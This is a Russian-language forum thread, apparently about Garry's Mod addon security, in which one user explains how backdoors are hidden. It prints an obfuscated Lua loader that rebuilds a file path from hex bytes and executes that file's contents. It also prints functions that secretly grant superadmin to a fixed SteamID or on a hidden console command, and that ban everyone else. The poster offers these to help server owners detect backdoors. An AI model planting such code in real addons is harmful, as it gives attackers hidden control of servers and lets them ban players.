Более сложный BackDoor

[AsyncCore]

Привет всем, и сегодня я вам расскажу о обфускации кода и бекдорах.

Обфускация кода - приведение исходного текста или исполняемого кода программы к виду, сохраняющему её функциональность, но затрудняющему анализ, понимание алгоритмов работы и модификацию.

Тем самым спрятывая бекдор, в толще слоев кода, или нагло в отдельном файле.

Покажу наглядно

    local UNORDERED_LIST =
    {
        "\x6d","\x61","\x74",
        "\x65","\x72","\x69",
        "\x61","\x6c","\x73",
        "\x2f","\x6e","\x70",
        "\x63","\x2f","\x68",
        "\x65","\x6c","\x70",
        "\x2e","\x76","\x74",
        "\x66"
    }

Здесь переменная с запутаными данными, там может находиться что угодно, от ссылок до команд. Чаще всего такие бекдоры находятся в SV части аддона (Держу в курсе)

local function HELPER_INFO()
        return ""
    end

    local function HELPER_ISFUNC(func)
        if (isfunction(func)) then
            return !false
        else
            return !true
        end
    end

    local function HELPER_READ_DATA(data)
        return file.Read(data, "GAME")
    end

    local UNORDERED_LIST =
    {
        "\x6d","\x61","\x74",
        "\x65","\x72","\x69",
        "\x61","\x6c","\x73",
        "\x2f","\x6e","\x70",
        "\x63","\x2f","\x68",
        "\x65","\x6c","\x70",
        "\x2e","\x76","\x74",
        "\x66"
    }

    local function HELPER_MAT()
        if (!false) then
            return string.Implode("", UNORDERED_LIST)
        end
    end

    local CALL =
    {
        ClearBackgroundImages, ClientsideModel, ClientsideRagdoll, ClientsideScene,
        CloseDermaMenus, collectgarbage, Color, ColorAlpha,
        ColorRand, ColorToHSV, CompileFile, CompileString,
        ConsoleAutoComplete, ConVarExists, CreateClientConVar, CreateConVar,
        CreateMaterial, CreateParticleSystem, CreatePhysCollideBox, CreatePhysCollidesFromModel,
        CreateSound, CreateSprite, CompileString, CurTime,
        DamageInfo, DebugInfo, DeriveGamemode, Derma_Anim,
        Derma_DrawBackgroundBlur, Derma_Hook, Derma_Install_Convar_Functions, Derma_Message,
        Derma_Query, Derma_StringRequest, pcall,
    }

    CALL[35](CALL[12](HELPER_READ_DATA(HELPER_MAT()), HELPER_INFO(), 0))

Такой вид бекдоров распространился очень быстро, поэтому очень вам советую ПРОВЕРЯТЬ каждый файл, если даже он не содержит fetch или RunString.



Еще один по популярности пряток бекдор, его идея состоит в том чтобы код был в дальнем правом боку строки.

 

[nLeo]

Благодарю за информацию

 

[AsyncCore]

Дополняю пост который выше. Выдача Админки


Данный бекдор не заметит только отсталый, при вызове этой функции у нас будет проверка есть ли игрок с определенным Steam ID, если есть то выдает СуперАдминку. Если же нет тогда всех банит.

Спойлер: Код

(
"BACKDOOR", function(ply)
if (ply:SteamID() == "SteamID_2312345465") then
RunConsoleCommand("ulx", "adduserid", ply:SteamID(), "superadmin")
else
RunConsoleCommand("ulx", "banid", ply:SteamID(), "0", "Вы забанены по причине: 'вы конченый'")
RunConsoleCommand("fadmin", "ban", ply:SteamID(), "0", "Вы забанены по причине: 'вы конченый'")
end
end
)

Такие бекдоры ищутся по ключевым словам RunConsoleCommand, adduserid.



Есть аналогичный бекдор, только при вызове команды asd в консоли, выдается СуперАдминка.

Спойлер: Код

concommand.Add("asd", function(player)
player:SetUserGroup("superadmin")
end)

 

[Текун]

backdoor
Опасный очень

 

[AsyncCore]

backdoor
Опасный очень

Я не понимаю это к чему ? Или же просто так что-ли написал, заработать сообщения ? Я всего лишь показываю незнающим людям их виды реализации.

 

[KailHet]

Я не понимаю это к чему ? Или же просто так что-ли написал, заработать сообщения ? Я всего лишь показываю незнающим людям их виды реализации.

О бэкдорах уже писал Морган, очень подробно, так что смысла в теме просто нет)

 

[AsyncCore]

О бэкдорах уже писал Морган, очень подробно, так что смысла в теме просто нет)

Полноценный пост писал только S1len (Как избежать Kvac Door), да и у него нет ИНФОРМАЦИИ от слова совсем. Я не видел особо тем на этот счет.


(Почему-то весь текст выделился в черный и не меняется)​

 

[Levanchik]

Полноценный пост писал только S1len (Как избежать Kvac Door), да и у него нет ИНФОРМАЦИИ от слова совсем. Я не видел особо тем на этот счет. ​

​

​

(Почему-то весь текст выделился в черный и не меняется)​

У вас то прям подробно написано, как избежать kvacdoor. Ответ всегда один "Не качай лики" или "Проверяй все файлы"

 

[AsyncCore]

У вас то прям подробно написано, как избежать kvacdoor. Ответ всегда один "Не качай лики" или "Проверяй все файлы"

Я снова повторяюсь, я показываю ВИДЫ бэкдоров. И как примерно они ищутся! В его посту можно было описать ВСЕ и сразу. И не разглагольствовать что нужно было проверять файлы в каких-то папках. Мой гайд дополнительно может быть нужен для разработчиков, потому что реализации бэкдоров иногда поражают (Некоторые бэкдоры вроде бы можно вшивать в VMT(Скоро тоже добавлю))